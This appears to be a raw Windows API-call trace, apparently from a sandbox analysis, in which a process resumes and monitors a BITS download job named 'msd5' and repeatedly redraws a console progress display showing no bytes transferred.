[0079.313] IUnknown:QueryInterface (in: This=0x440cc8, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x440ddc | out: ppvObject=0x440ddc*=0x0) returned 0x80004002
[0079.313] IUnknown:QueryInterface (in: This=0x440cc8, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x2cf4d4 | out: ppvObject=0x2cf4d4*=0x0) returned 0x80004002
[0079.313] IUnknown:Release (This=0x440cc8) returned 0x2
[0079.316] IUnknown:QueryInterface (in: This=0x440cc8, riid=0x431c40*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x2ce9dc | out: ppvObject=0x2ce9dc*=0x0) returned 0x80004002
[0079.316] IUnknown:QueryInterface (in: This=0x440cc8, riid=0x431c40*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x2ce9dc | out: ppvObject=0x2ce9dc*=0x440cc8) returned 0x0
[0079.317] IUnknown:QueryInterface (in: This=0x440cc8, riid=0x431c40*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x438318 | out: ppvObject=0x438318*=0x440cc8) returned 0x0
[0079.319] IBackgroundCopyJob:Resume (This=0x42a654) returned 0x0
[0079.323] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0079.323] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0079.323] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x2cfaf0 | out: lpMode=0x2cfaf0) returned 1
[0079.343] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0079.363] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x2cfb30*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0079.363] PeekMessageW (in: lpMsg=0x2cfb08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2cfb08) returned 1
[0079.363] TranslateMessage (lpMsg=0x2cfb08) returned 0
[0079.363] DispatchMessageW (lpMsg=0x2cfb08) returned 0x1
[0079.363] IUnknown:QueryInterface (in: This=0x440cc8, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x2cf664 | out: ppvObject=0x2cf664*=0x0) returned 0x80004002
[0079.363] IBackgroundCopyCallback:JobModification (This=0x440cc8, pJob=0x42a6e4, dwReserved=0x0) returned 0x0
[0079.364] IBackgroundCopyJob:GetState (in: This=0x42a654, pVal=0x440cd4 | out: pVal=0x440cd4) returned 0x0
[0079.364] IBackgroundCopyCallback:JobModification (This=0x440cc8, pJob=0x42a6e4, dwReserved=0x0) returned 0x0
[0079.364] IBackgroundCopyJob:GetState (in: This=0x42a654, pVal=0x440cd4 | out: pVal=0x440cd4) returned 0x0
[0079.367] IBackgroundCopyJob:GetType (in: This=0x42a654, pVal=0x2ce1c8 | out: pVal=0x2ce1c8) returned 0x0
[0079.368] IBackgroundCopyJob:GetProgress (in: This=0x42a654, pVal=0x440cd8 | out: pVal=0x440cd8) returned 0x0
[0079.369] IBackgroundCopyJob:GetPriority (in: This=0x42a654, pVal=0x2ce1c4 | out: pVal=0x2ce1c4) returned 0x0
[0079.369] CoTaskMemFree (pv=0x0)
[0079.369] IBackgroundCopyJob:GetDisplayName (in: This=0x42a654, pVal=0x2ce1dc | out: pVal=0x2ce1dc*="msd5") returned 0x0
[0079.370] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce184 | out: lpConsoleScreenBufferInfo=0x2ce184) returned 1
[0079.370] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x2ce19c | out: lpNumberOfCharsWritten=0x2ce19c) returned 1
[0079.371] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x2ce19c | out: lpNumberOfAttrsWritten=0x2ce19c) returned 1
[0079.371] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0079.371] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.371] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce170 | out: lpConsoleScreenBufferInfo=0x2ce170) returned 1
[0079.372] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2ce188, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce188*=0xa) returned 1
[0079.372] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.372] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce16c | out: lpConsoleScreenBufferInfo=0x2ce16c) returned 1
[0079.372] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2ce184, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce184*=0x5) returned 1
[0079.372] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce174 | out: lpConsoleScreenBufferInfo=0x2ce174) returned 1
[0079.373] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2ce18c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce18c*=0x7) returned 1
[0079.373] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce168 | out: lpConsoleScreenBufferInfo=0x2ce168) returned 1
[0079.373] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce180, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce180*=0x8) returned 1
[0079.373] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.374] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce170 | out: lpConsoleScreenBufferInfo=0x2ce170) returned 1
[0079.374] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce188, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce188*=0x8) returned 1
[0079.374] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.374] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce164 | out: lpConsoleScreenBufferInfo=0x2ce164) returned 1
[0079.374] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2ce17c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce17c*=0xc) returned 1
[0079.374] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.375] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce174 | out: lpConsoleScreenBufferInfo=0x2ce174) returned 1
[0079.375] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2ce18c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce18c*=0xa) returned 1
[0079.375] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.375] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce15c | out: lpConsoleScreenBufferInfo=0x2ce15c) returned 1
[0079.375] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2ce174, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce174*=0xa) returned 1
[0079.376] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.376] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce164 | out: lpConsoleScreenBufferInfo=0x2ce164) returned 1
[0079.376] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce17c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce17c*=0x8) returned 1
[0079.376] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.376] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce188 | out: _Buffer="0") returned 1
[0079.376] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce194 | out: _Buffer="1") returned 1
[0079.376] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce164 | out: lpConsoleScreenBufferInfo=0x2ce164) returned 1
[0079.376] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2ce17c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce17c*=0x5) returned 1
[0079.377] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.377] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce16c | out: lpConsoleScreenBufferInfo=0x2ce16c) returned 1
[0079.377] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce184, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce184*=0x8) returned 1
[0079.377] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.378] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce190 | out: _Buffer="0") returned 1
[0079.378] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ce184 | out: lpSystemTimeAsFileTime=0x2ce184*(dwLowDateTime=0xdfe49170, dwHighDateTime=0x1d469c7))
[0079.378] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ce17c | out: lpSystemTimeAsFileTime=0x2ce17c*(dwLowDateTime=0xdfe49170, dwHighDateTime=0x1d469c7))
[0079.378] _finite (_X=0x0) returned 0
[0079.378] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce13c | out: lpConsoleScreenBufferInfo=0x2ce13c) returned 1
[0079.378] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x2ce154, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce154*=0xd) returned 1
[0079.378] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.378] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce148 | out: lpConsoleScreenBufferInfo=0x2ce148) returned 1
[0079.379] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x2ce160, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce160*=0xf) returned 1
[0079.379] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.379] _vsnwprintf (in: _Buffer=0x2cdf74, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x2cdf38 | out: _Buffer="0.00 B/S") returned 8
[0079.379] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce18c | out: lpConsoleScreenBufferInfo=0x2ce18c) returned 1
[0079.379] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce1a4, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce1a4*=0x8) returned 1
[0079.380] CoTaskMemFree (pv=0x4383b0)
[0079.380] IBackgroundCopyJob:GetType (in: This=0x42a654, pVal=0x2cf1d0 | out: pVal=0x2cf1d0) returned 0x0
[0079.381] IBackgroundCopyJob:GetProgress (in: This=0x42a654, pVal=0x440cd8 | out: pVal=0x440cd8) returned 0x0
[0079.382] IBackgroundCopyJob:GetPriority (in: This=0x42a654, pVal=0x2cf1cc | out: pVal=0x2cf1cc) returned 0x0
[0079.383] CoTaskMemFree (pv=0x0)
[0079.383] IBackgroundCopyJob:GetDisplayName (in: This=0x42a654, pVal=0x2cf1e4 | out: pVal=0x2cf1e4*="msd5") returned 0x0
[0079.383] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf18c | out: lpConsoleScreenBufferInfo=0x2cf18c) returned 1
[0079.384] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x2cf1a4 | out: lpNumberOfCharsWritten=0x2cf1a4) returned 1
[0079.384] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x2cf1a4 | out: lpNumberOfAttrsWritten=0x2cf1a4) returned 1
[0079.384] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0079.384] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.384] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf178 | out: lpConsoleScreenBufferInfo=0x2cf178) returned 1
[0079.385] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2cf190, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf190*=0xa) returned 1
[0079.385] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.385] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf174 | out: lpConsoleScreenBufferInfo=0x2cf174) returned 1
[0079.385] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2cf18c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf18c*=0x5) returned 1
[0079.385] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.386] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf17c | out: lpConsoleScreenBufferInfo=0x2cf17c) returned 1
[0079.386] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2cf194, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf194*=0x7) returned 1
[0079.386] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.386] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf170 | out: lpConsoleScreenBufferInfo=0x2cf170) returned 1
[0079.386] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf188, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf188*=0x8) returned 1
[0079.387] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.387] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf178 | out: lpConsoleScreenBufferInfo=0x2cf178) returned 1
[0079.387] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf190, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf190*=0x8) returned 1
[0079.387] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.387] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf16c | out: lpConsoleScreenBufferInfo=0x2cf16c) returned 1
[0079.388] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2cf184, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf184*=0xc) returned 1
[0079.388] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf17c | out: lpConsoleScreenBufferInfo=0x2cf17c) returned 1
[0079.388] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2cf194, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf194*=0xa) returned 1
[0079.388] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.389] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf164 | out: lpConsoleScreenBufferInfo=0x2cf164) returned 1
[0079.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2cf17c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf17c*=0xa) returned 1
[0079.389] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.389] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf16c | out: lpConsoleScreenBufferInfo=0x2cf16c) returned 1
[0079.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf184, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf184*=0x8) returned 1
[0079.390] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.390] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf190 | out: _Buffer="0") returned 1
[0079.390] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf19c | out: _Buffer="1") returned 1
[0079.390] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf16c | out: lpConsoleScreenBufferInfo=0x2cf16c) returned 1
[0079.390] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2cf184, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf184*=0x5) returned 1
[0079.390] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.390] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf174 | out: lpConsoleScreenBufferInfo=0x2cf174) returned 1
[0079.391] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf18c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf18c*=0x8) returned 1
[0079.391] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.391] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf198 | out: _Buffer="0") returned 1
[0079.391] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf184 | out: lpSystemTimeAsFileTime=0x2cf184*(dwLowDateTime=0xdfe6f2d0, dwHighDateTime=0x1d469c7))
[0079.391] _finite (_X=0x0) returned 1
[0079.391] _finite (_X=0x0) returned 1
[0079.391] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf144 | out: lpConsoleScreenBufferInfo=0x2cf144) returned 1
[0079.391] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x2cf15c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf15c*=0xd) returned 1
[0079.392] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.392] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf150 | out: lpConsoleScreenBufferInfo=0x2cf150) returned 1
[0079.392] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x2cf168, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf168*=0xf) returned 1
[0079.392] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.393] _vsnwprintf (in: _Buffer=0x2cef7c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x2cef40 | out: _Buffer="0.00 B/S") returned 8
[0079.393] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf194 | out: lpConsoleScreenBufferInfo=0x2cf194) returned 1
[0079.393] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf1ac, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf1ac*=0x8) returned 1
[0079.393] CoTaskMemFree (pv=0x4383b0)
[0079.394] PeekMessageW (in: lpMsg=0x2cfb08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2cfb08) returned 0
[0079.394] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x2cfb30*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0079.490] PeekMessageW (in: lpMsg=0x2cfb08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2cfb08) returned 1
[0079.490] TranslateMessage (lpMsg=0x2cfb08) returned 0
[0079.490] DispatchMessageW (lpMsg=0x2cfb08) returned 0x1
[0079.491] IBackgroundCopyCallback:JobModification (This=0x440cc8, pJob=0x42a6e4, dwReserved=0x0) returned 0x0
[0079.491] IBackgroundCopyJob:GetState (in: This=0x42a654, pVal=0x440cd4 | out: pVal=0x440cd4) returned 0x0
[0079.498] IBackgroundCopyCallback:JobModification (This=0x440cc8, pJob=0x42a6e4, dwReserved=0x0) returned 0x0
[0079.498] IBackgroundCopyJob:GetState (in: This=0x42a654, pVal=0x440cd4 | out: pVal=0x440cd4) returned 0x0
[0079.499] IBackgroundCopyJob:GetType (in: This=0x42a654, pVal=0x2ce138 | out: pVal=0x2ce138) returned 0x0
[0079.500] IBackgroundCopyJob:GetProgress (in: This=0x42a654, pVal=0x440cd8 | out: pVal=0x440cd8) returned 0x0
[0079.500] IBackgroundCopyJob:GetPriority (in: This=0x42a654, pVal=0x2ce134 | out: pVal=0x2ce134) returned 0x0
[0079.501] CoTaskMemFree (pv=0x0)
[0079.501] IBackgroundCopyJob:GetDisplayName (in: This=0x42a654, pVal=0x2ce14c | out: pVal=0x2ce14c*="msd5") returned 0x0
[0079.502] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0f4 | out: lpConsoleScreenBufferInfo=0x2ce0f4) returned 1
[0079.502] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x2ce10c | out: lpNumberOfCharsWritten=0x2ce10c) returned 1
[0079.502] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x2ce10c | out: lpNumberOfAttrsWritten=0x2ce10c) returned 1
[0079.503] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0079.503] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.503] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0e0 | out: lpConsoleScreenBufferInfo=0x2ce0e0) returned 1
[0079.503] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2ce0f8, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f8*=0xa) returned 1
[0079.503] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0dc | out: lpConsoleScreenBufferInfo=0x2ce0dc) returned 1
[0079.504] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2ce0f4, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f4*=0x5) returned 1
[0079.504] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0e4 | out: lpConsoleScreenBufferInfo=0x2ce0e4) returned 1
[0079.504] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2ce0fc, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0fc*=0x7) returned 1
[0079.505] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.505] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0d8 | out: lpConsoleScreenBufferInfo=0x2ce0d8) returned 1
[0079.505] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce0f0, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f0*=0x8) returned 1
[0079.505] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.505] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0e0 | out: lpConsoleScreenBufferInfo=0x2ce0e0) returned 1
